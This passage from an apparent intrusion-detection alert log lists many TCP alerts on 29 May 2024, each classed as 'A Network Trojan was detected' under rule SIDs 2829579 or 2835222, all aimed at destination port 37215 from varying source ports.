                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.900278
                SID:2829579
                Source Port:59658
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.358757
                SID:2829579
                Source Port:53110
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.800905
                SID:2829579
                Source Port:38172
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.032930
                SID:2829579
                Source Port:36726
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.950172
                SID:2829579
                Source Port:55480
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.940086
                SID:2829579
                Source Port:59818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.173373
                SID:2829579
                Source Port:38906
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.617438
                SID:2829579
                Source Port:43304
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.626599
                SID:2829579
                Source Port:52976
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.557736
                SID:2835222
                Source Port:46554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.080515
                SID:2829579
                Source Port:59158
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.266708
                SID:2829579
                Source Port:40760
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.662118
                SID:2835222
                Source Port:44626
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.917683
                SID:2835222
                Source Port:33368
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.712784
                SID:2835222
                Source Port:44674
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.215457
                SID:2835222
                Source Port:39886
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.689081
                SID:2829579
                Source Port:56466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.663193
                SID:2829579
                Source Port:45168
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.931142
                SID:2835222
                Source Port:44546
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.415928
                SID:2829579
                Source Port:53980
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.585037
                SID:2829579
                Source Port:43230
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.890146
                SID:2829579
                Source Port:59368
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.261444
                SID:2829579
                Source Port:35826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.840752
                SID:2829579
                Source Port:38034
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.444511
                SID:2835222
                Source Port:42452
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.224342
                SID:2835222
                Source Port:55302
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.466099
                SID:2835222
                Source Port:34662
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.439622
                SID:2835222
                Source Port:38134
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.631213
                SID:2829579
                Source Port:38416
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.901177
                SID:2829579
                Source Port:40406
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.968355
                SID:2829579
                Source Port:38788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.279275
                SID:2829579
                Source Port:33324
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.593501
                SID:2835222
                Source Port:52890
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.009936
                SID:2829579
                Source Port:41726
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.558203
                SID:2835222
                Source Port:35354
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.659838
                SID:2835222
                Source Port:56854
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.037423
                SID:2835222
                Source Port:45308
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.840184
                SID:2835222
                Source Port:41122
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.587063
                SID:2829579
                Source Port:40852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.262671
                SID:2829579
                Source Port:60790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.225687
                SID:2835222
                Source Port:39746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.948561
                SID:2829579
                Source Port:33768
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.111700
                SID:2835222
                Source Port:56938
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.967465
                SID:2829579
                Source Port:34812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.947336
                SID:2829579
                Source Port:43384
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.509836
                SID:2829579
                Source Port:34466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.928618
                SID:2835222
                Source Port:39056
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.654572
                SID:2829579
                Source Port:38560
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.878725
                SID:2835222
                Source Port:60310
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.716175
                SID:2829579
                Source Port:49992
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.944551
                SID:2835222
                Source Port:51706
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.263774
                SID:2829579
                Source Port:60654
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.787576
                SID:2829579
                Source Port:60938
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.440622
                SID:2835222
                Source Port:32826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.890765
                SID:2835222
                Source Port:55610
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.463957
                SID:2835222
                Source Port:47602
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.959727
                SID:2835222
                Source Port:49266
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.725513
                SID:2829579
                Source Port:57978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.287556
                SID:2829579
                Source Port:56446
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.779887
                SID:2835222
                Source Port:45948
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.942900
                SID:2829579
                Source Port:37322
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.567223
                SID:2835222
                Source Port:55946
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.617431
                SID:2835222
                Source Port:34834
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.385113
                SID:2829579
                Source Port:36724
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.273896
                SID:2835222
                Source Port:38892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.859484
                SID:2829579
                Source Port:54132
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.675399
                SID:2835222
                Source Port:37116
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.987163
                SID:2829579
                Source Port:42276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.947376
                SID:2835222
                Source Port:46942
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.610247
                SID:2829579
                Source Port:48034
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.257263
                SID:2829579
                Source Port:36466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.899083
                SID:2835222
                Source Port:54066
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.075217
                SID:2835222
                Source Port:60766
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.618849
                SID:2829579
                Source Port:49060
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.899030
                SID:2835222
                Source Port:40048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.210830
                SID:2835222
                Source Port:40164
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.136111
                SID:2835222
                Source Port:44932
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.732314
                SID:2835222
                Source Port:48776
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.886003
                SID:2829579
                Source Port:41142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.161336
                SID:2835222
                Source Port:60392
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.877200
                SID:2835222
                Source Port:51112
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.022556
                SID:2835222
                Source Port:51384
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.630361
                SID:2829579
                Source Port:60600
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.944613
                SID:2829579
                Source Port:39944
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.790540
                SID:2835222
                Source Port:44674
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.969673
                SID:2829579
                Source Port:42366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.883146
                SID:2829579
                Source Port:60918
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.913045
                SID:2835222
                Source Port:46706
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.863007
                SID:2829579
                Source Port:35264
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.166279
                SID:2829579
                Source Port:45548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.915784
                SID:2829579
                Source Port:46626
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.226144
                SID:2835222
                Source Port:33414
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.234142
                SID:2829579
                Source Port:46088
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.862931
                SID:2829579
                Source Port:39482
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.180323
                SID:2835222
                Source Port:33106
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.832958
                SID:2835222
                Source Port:55762
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.874905
                SID:2835222
                Source Port:52810
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.113902
                SID:2835222
                Source Port:33424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.282062
                SID:2829579
                Source Port:35168
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.793735
                SID:2829579
                Source Port:46138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:26.002037
                SID:2835222
                Source Port:56604
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.071235
                SID:2835222
                Source Port:33142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.670857
                SID:2835222
                Source Port:51502
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.834493
                SID:2829579
                Source Port:41102
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.174965
                SID:2835222
                Source Port:55452
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.788368
                SID:2835222
                Source Port:34782
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.667410
                SID:2829579
                Source Port:48286
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.088365
                SID:2829579
                Source Port:32998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.461384
                SID:2835222
                Source Port:60670
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.950044
                SID:2829579
                Source Port:44266
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.981488
                SID:2835222
                Source Port:44962
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.685595
                SID:2829579
                Source Port:53512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.209565
                SID:2835222
                Source Port:47512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.669303
                SID:2835222
                Source Port:35288
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.732356
                SID:2835222
                Source Port:34444
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.849041
                SID:2829579
                Source Port:58630
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.455123
                SID:2829579
                Source Port:60582
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.234047
                SID:2835222
                Source Port:50560
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.967628
                SID:2829579
                Source Port:53410
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.782225
                SID:2835222
                Source Port:53364
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.531498
                SID:2835222
                Source Port:41268
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.266478
                SID:2835222
                Source Port:34036
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.140681
                SID:2835222
                Source Port:52910
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.919547
                SID:2835222
                Source Port:33518
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.689552
                SID:2829579
                Source Port:42820
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.810429
                SID:2835222
                Source Port:42162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.262709
                SID:2829579
                Source Port:53578
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.856169
                SID:2829579
                Source Port:51468
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.429490
                SID:2835222
                Source Port:41750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.716044
                SID:2829579
                Source Port:37376
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.722054
                SID:2829579
                Source Port:59634
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.280543
                SID:2829579
                Source Port:38918
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.779756
                SID:2835222
                Source Port:55440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.842230
                SID:2835222
                Source Port:50384
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.227537
                SID:2829579
                Source Port:51670
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.784335
                SID:2829579
                Source Port:39022
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.915042
                SID:2829579
                Source Port:44036
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.942923
                SID:2829579
                Source Port:41818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.870451
                SID:2829579
                Source Port:34516
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.028109
                SID:2829579
                Source Port:57740
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.712740
                SID:2835222
                Source Port:56146
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.113534
                SID:2829579
                Source Port:49768
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.264880
                SID:2835222
                Source Port:47476
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.449668
                SID:2829579
                Source Port:44718
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.816568
                SID:2829579
                Source Port:56740
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.031514
                SID:2829579
                Source Port:54124
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.436271
                SID:2829579
                Source Port:55946
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.919579
                SID:2829579
                Source Port:42878
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.131595
                SID:2829579
                Source Port:39100
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.263730
                SID:2835222
                Source Port:37812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.655982
                SID:2829579
                Source Port:37582
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.809291
                SID:2829579
                Source Port:59904
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.531052
                SID:2829579
                Source Port:53442
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.864468
                SID:2829579
                Source Port:46688
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.266527
                SID:2829579
                Source Port:47358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.009732
                SID:2835222
                Source Port:45736
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.574286
                SID:2835222
                Source Port:37570
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.958192
                SID:2835222
                Source Port:54162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.363102
                SID:2835222
                Source Port:51878
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.263731
                SID:2835222
                Source Port:52052
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.869131
                SID:2829579
                Source Port:40516
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.189872
                SID:2835222
                Source Port:38010
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.466110
                SID:2835222
                Source Port:40834
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.614360
                SID:2829579
                Source Port:42004
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.984643
                SID:2829579
                Source Port:37998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.949666
                SID:2835222
                Source Port:58668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.915478
                SID:2829579
                Source Port:43850
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.034703
                SID:2835222
                Source Port:41494
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.165822
                SID:2829579
                Source Port:56466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.512345
                SID:2835222
                Source Port:57690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.015038
                SID:2835222
                Source Port:50252
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.702042
                SID:2829579
                Source Port:34784
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.988730
                SID:2829579
                Source Port:34502
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.264036
                SID:2829579
                Source Port:45772
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.765092
                SID:2835222
                Source Port:45440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.025869
                SID:2829579
                Source Port:50618
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.815915
                SID:2829579
                Source Port:49566
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.273183
                SID:2829579
                Source Port:41194
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.088510
                SID:2835222
                Source Port:59638
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.011001
                SID:2835222
                Source Port:35276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.463996
                SID:2829579
                Source Port:49046
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.277393
                SID:2829579
                Source Port:55876
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.442073
                SID:2835222
                Source Port:47650
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.531672
                SID:2835222
                Source Port:56808
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.120571
                SID:2829579
                Source Port:38834
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.811642
                SID:2835222
                Source Port:56998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.628558
                SID:2829579
                Source Port:42820
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.263196
                SID:2829579
                Source Port:36196
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.667690
                SID:2829579
                Source Port:39456
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.134717
                SID:2835222
                Source Port:51272
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.435034
                SID:2835222
                Source Port:46588
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.266643
                SID:2835222
                Source Port:47590
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.225650
                SID:2829579
                Source Port:49540
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.163508
                SID:2829579
                Source Port:35678
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.418591
                SID:2829579
                Source Port:43228
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.873504
                SID:2835222
                Source Port:34980
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.448620
                SID:2829579
                Source Port:51130
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
